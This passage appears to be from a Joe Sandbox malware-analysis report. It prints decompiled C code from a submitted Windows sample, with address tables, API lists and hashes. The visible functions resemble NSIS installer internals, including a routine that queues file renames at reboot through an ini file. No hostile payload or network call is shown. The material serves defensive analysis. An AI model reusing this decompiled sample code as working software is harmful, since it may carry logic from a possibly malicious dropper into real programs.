									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                    0x00405038
                                                                                    0x00405051
                                                                                    0x00405056
                                                                                    0x0040505e
                                                                                    0x00405064
                                                                                    0x0040507a
                                                                                    0x0040507d
                                                                                    0x004052a8
                                                                                    0x004052af
                                                                                    0x004052c3
                                                                                    0x004052b1
                                                                                    0x004052b3
                                                                                    0x004052b6
                                                                                    0x004052b7
                                                                                    0x004052be
                                                                                    0x004052be
                                                                                    0x004052cf
                                                                                    0x004052dd
                                                                                    0x004052e0
                                                                                    0x004052f6
                                                                                    0x0040536b
                                                                                    0x0040536e
                                                                                    0x00405370
                                                                                    0x0040537a
                                                                                    0x00405388
                                                                                    0x00405388
                                                                                    0x0040538a
                                                                                    0x00405394
                                                                                    0x0040539a
                                                                                    0x0040539d
                                                                                    0x004053a0
                                                                                    0x004053bb
                                                                                    0x004053a2
                                                                                    0x004053ac
                                                                                    0x004053ac
                                                                                    0x004053a0
                                                                                    0x00405394
                                                                                    0x00000000
                                                                                    0x0040536e
                                                                                    0x004052fb
                                                                                    0x00405306
                                                                                    0x0040530b
                                                                                    0x00405312
                                                                                    0x00405317
                                                                                    0x0040531b
                                                                                    0x00405326
                                                                                    0x00405326
                                                                                    0x0040532a
                                                                                    0x0040532e
                                                                                    0x00405332
                                                                                    0x00405345
                                                                                    0x00405334
                                                                                    0x00405334
                                                                                    0x0040533b
                                                                                    0x00405341
                                                                                    0x0040533d
                                                                                    0x0040533d
                                                                                    0x0040533d
                                                                                    0x0040533b
                                                                                    0x00405349
                                                                                    0x0040534b
                                                                                    0x0040535e
                                                                                    0x00405361
                                                                                    0x00405364
                                                                                    0x00405364
                                                                                    0x0040532e
                                                                                    0x00000000
                                                                                    0x0040531b
                                                                                    0x004052fd
                                                                                    0x00405304
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004053be
                                                                                    0x004053be
                                                                                    0x004053c5
                                                                                    0x00405436
                                                                                    0x0040543e
                                                                                    0x00405446
                                                                                    0x00405446
                                                                                    0x0040544f
                                                                                    0x00405451
                                                                                    0x00405458
                                                                                    0x0040545b
                                                                                    0x0040545b
                                                                                    0x00405461
                                                                                    0x00405468
                                                                                    0x0040546b
                                                                                    0x0040546b
                                                                                    0x00405471
                                                                                    0x00405477
                                                                                    0x0040547d
                                                                                    0x0040547d
                                                                                    0x0040548a
                                                                                    0x004055eb
                                                                                    0x004055f2
                                                                                    0x0040560f
                                                                                    0x00405615
                                                                                    0x00405627
                                                                                    0x00405627
                                                                                    0x00000000
                                                                                    0x00405490
                                                                                    0x00405492
                                                                                    0x00405497
                                                                                    0x0040549c
                                                                                    0x004054a1
                                                                                    0x004054a3
                                                                                    0x004054a3
                                                                                    0x004054a4
                                                                                    0x004054a5
                                                                                    0x004054a7
                                                                                    0x004054a7
                                                                                    0x004054af
                                                                                    0x004054f0
                                                                                    0x004054f2
                                                                                    0x00405502
                                                                                    0x00405505
                                                                                    0x0040550a
                                                                                    0x00405511
                                                                                    0x00405514
                                                                                    0x004055b6
                                                                                    0x004055bf
                                                                                    0x004055c7
                                                                                    0x004055c7
                                                                                    0x004055d5
                                                                                    0x004055e6
                                                                                    0x004055e6
                                                                                    0x00000000
                                                                                    0x004055d5
                                                                                    0x0040551a
                                                                                    0x0040551d
                                                                                    0x00405523
                                                                                    0x00405528
                                                                                    0x0040552a
                                                                                    0x0040552c
                                                                                    0x00405532
                                                                                    0x00405539
                                                                                    0x0040553e
                                                                                    0x00405545
                                                                                    0x00405548
                                                                                    0x00405548
                                                                                    0x0040554f
                                                                                    0x0040555b
                                                                                    0x0040555f
                                                                                    0x00405561
                                                                                    0x00405561
                                                                                    0x00405551
                                                                                    0x00405553
                                                                                    0x00405553
                                                                                    0x00405581
                                                                                    0x0040558d
                                                                                    0x0040559c
                                                                                    0x0040559c
                                                                                    0x0040559e
                                                                                    0x004055a1
                                                                                    0x004055aa
                                                                                    0x00000000
                                                                                    0x004054b1
                                                                                    0x004054bc
                                                                                    0x004054bf
                                                                                    0x004054c4
                                                                                    0x004054c6
                                                                                    0x004054ca
                                                                                    0x004054da
                                                                                    0x004054e4
                                                                                    0x004054e6
                                                                                    0x004054e9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004054cc
                                                                                    0x004054cc
                                                                                    0x004054d2
                                                                                    0x004054d4
                                                                                    0x004054d4
                                                                                    0x004054d5
                                                                                    0x004054d6
                                                                                    0x00000000
                                                                                    0x004054cc
                                                                                    0x004054af
                                                                                    0x0040548a
                                                                                    0x004053cd
                                                                                    0x00000000
                                                                                    0x004053e3
                                                                                    0x004053ed
                                                                                    0x004053f2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405404
                                                                                    0x00405409
                                                                                    0x00405415
                                                                                    0x00405415
                                                                                    0x00405417
                                                                                    0x00405426
                                                                                    0x00405428
                                                                                    0x0040542c
                                                                                    0x0040542f
                                                                                    0x00000000
                                                                                    0x0040542f
                                                                                    0x004053cd
                                                                                    0x00405083
                                                                                    0x00405088
                                                                                    0x00405091
                                                                                    0x00405098
                                                                                    0x004050aa
                                                                                    0x004050b5
                                                                                    0x004050bb
                                                                                    0x004050c9
                                                                                    0x004050dd
                                                                                    0x004050e2
                                                                                    0x004050ef
                                                                                    0x004050f4
                                                                                    0x0040510a
                                                                                    0x0040511b
                                                                                    0x00405128
                                                                                    0x00405128
                                                                                    0x0040512b
                                                                                    0x00405131
                                                                                    0x00405133
                                                                                    0x00405136
                                                                                    0x0040513b
                                                                                    0x00405140
                                                                                    0x00405142
                                                                                    0x00405142
                                                                                    0x00405162
                                                                                    0x00405162
                                                                                    0x00405164
                                                                                    0x00405165
                                                                                    0x0040516a
                                                                                    0x00405170
                                                                                    0x00405174
                                                                                    0x00405179
                                                                                    0x00405181
                                                                                    0x00405185
                                                                                    0x0040518a
                                                                                    0x0040518f
                                                                                    0x00405197
                                                                                    0x0040519a
                                                                                    0x0040526a
                                                                                    0x0040527d
                                                                                    0x00000000
                                                                                    0x004051a0
                                                                                    0x004051a3
                                                                                    0x004051a6
                                                                                    0x004051a9
                                                                                    0x004051a9
                                                                                    0x004051af
                                                                                    0x004051b8
                                                                                    0x004051bb
                                                                                    0x004051bf
                                                                                    0x004051c2
                                                                                    0x004051c5
                                                                                    0x004051ce
                                                                                    0x004051d7
                                                                                    0x004051da
                                                                                    0x004051dd
                                                                                    0x004051e0
                                                                                    0x0040521e
                                                                                    0x00405249
                                                                                    0x00405220
                                                                                    0x0040522f
                                                                                    0x0040522f
                                                                                    0x004051e2
                                                                                    0x004051e5
                                                                                    0x004051f3
                                                                                    0x004051fd
                                                                                    0x00405205
                                                                                    0x0040520c
                                                                                    0x00405217
                                                                                    0x00405217
                                                                                    0x004051e0
                                                                                    0x0040524f
                                                                                    0x00405250
                                                                                    0x0040525c
                                                                                    0x0040525c
                                                                                    0x00405268
                                                                                    0x00405283
                                                                                    0x00405286
                                                                                    0x004052a3
                                                                                    0x00000000
                                                                                    0x00405288
                                                                                    0x0040528d
                                                                                    0x00405296
                                                                                    0x00405629
                                                                                    0x0040563b
                                                                                    0x0040563b
                                                                                    0x00405286
                                                                                    0x00000000
                                                                                    0x00405268
                                                                                    0x0040519a

                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                    • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                    • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                    • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                    • ShowWindow.USER32(00000000), ref: 00405627
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                                                    0x00404795
                                                                                    0x004048c2
                                                                                    0x0040491f
                                                                                    0x00404923
                                                                                    0x004049f0
                                                                                    0x004049f2
                                                                                    0x004049f2
                                                                                    0x004049f8
                                                                                    0x004049f8
                                                                                    0x004049fb
                                                                                    0x00000000
                                                                                    0x00404a02
                                                                                    0x00404931
                                                                                    0x00404937
                                                                                    0x00404941
                                                                                    0x0040494c
                                                                                    0x0040494f
                                                                                    0x00404952
                                                                                    0x0040495d
                                                                                    0x00404960
                                                                                    0x00404967
                                                                                    0x00404974
                                                                                    0x00404985
                                                                                    0x0040498b
                                                                                    0x00404993
                                                                                    0x004049a1
                                                                                    0x004049a7
                                                                                    0x004049a7
                                                                                    0x00404967
                                                                                    0x004049b1
                                                                                    0x00000000
                                                                                    0x004049bc
                                                                                    0x004049c0
                                                                                    0x004049d0
                                                                                    0x004049d0
                                                                                    0x004049d6
                                                                                    0x004049e2
                                                                                    0x004049e2
                                                                                    0x00000000
                                                                                    0x004049e6
                                                                                    0x004049b1
                                                                                    0x004048cd
                                                                                    0x00000000
                                                                                    0x004048df
                                                                                    0x004048e4
                                                                                    0x004048ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404913
                                                                                    0x00404915
                                                                                    0x0040491a
                                                                                    0x00000000
                                                                                    0x0040491a
                                                                                    0x004048cd
                                                                                    0x0040479b
                                                                                    0x0040479e
                                                                                    0x004047a3
                                                                                    0x004047b4
                                                                                    0x004047b4
                                                                                    0x004047bc
                                                                                    0x004047bf
                                                                                    0x004047c3
                                                                                    0x004047c6
                                                                                    0x004047ca
                                                                                    0x004047cd
                                                                                    0x004047d0
                                                                                    0x004047d3
                                                                                    0x004047da
                                                                                    0x004047dc
                                                                                    0x004047dc
                                                                                    0x004047e6
                                                                                    0x004047f3
                                                                                    0x004047fd
                                                                                    0x00404802
                                                                                    0x00404805
                                                                                    0x0040480a
                                                                                    0x00404821
                                                                                    0x00404828
                                                                                    0x0040483b
                                                                                    0x0040483e
                                                                                    0x00404852
                                                                                    0x00404859
                                                                                    0x0040485e
                                                                                    0x00404863
                                                                                    0x00404863
                                                                                    0x00404871
                                                                                    0x0040487f
                                                                                    0x00404891
                                                                                    0x00404896
                                                                                    0x004048a6
                                                                                    0x004048a8
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                    • GetSysColor.USER32(?), ref: 00404863
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                    • SendMessageW.USER32(00000000), ref: 00404906
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                    • SetCursor.USER32(00000000), ref: 00404985
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                    • SetCursor.USER32(00000000), ref: 004049A1
                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: Call$N
                                                                                    • API String ID: 3103080414-3438112850
                                                                                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                    0x004062ae
                                                                                    0x004062b7
                                                                                    0x004062be
                                                                                    0x004062c8
                                                                                    0x004062dc
                                                                                    0x00406304
                                                                                    0x0040630b
                                                                                    0x0040630f
                                                                                    0x00406313
                                                                                    0x00406333
                                                                                    0x0040633a
                                                                                    0x00406344
                                                                                    0x00406351
                                                                                    0x00406356
                                                                                    0x0040635b
                                                                                    0x0040635f
                                                                                    0x0040636e
                                                                                    0x00406370
                                                                                    0x0040637d
                                                                                    0x00406381
                                                                                    0x0040641c
                                                                                    0x00000000
                                                                                    0x00406397
                                                                                    0x004063a4
                                                                                    0x004063c8
                                                                                    0x004063cc
                                                                                    0x004063eb
                                                                                    0x004063ef
                                                                                    0x004063ef
                                                                                    0x004063f1
                                                                                    0x004063fa
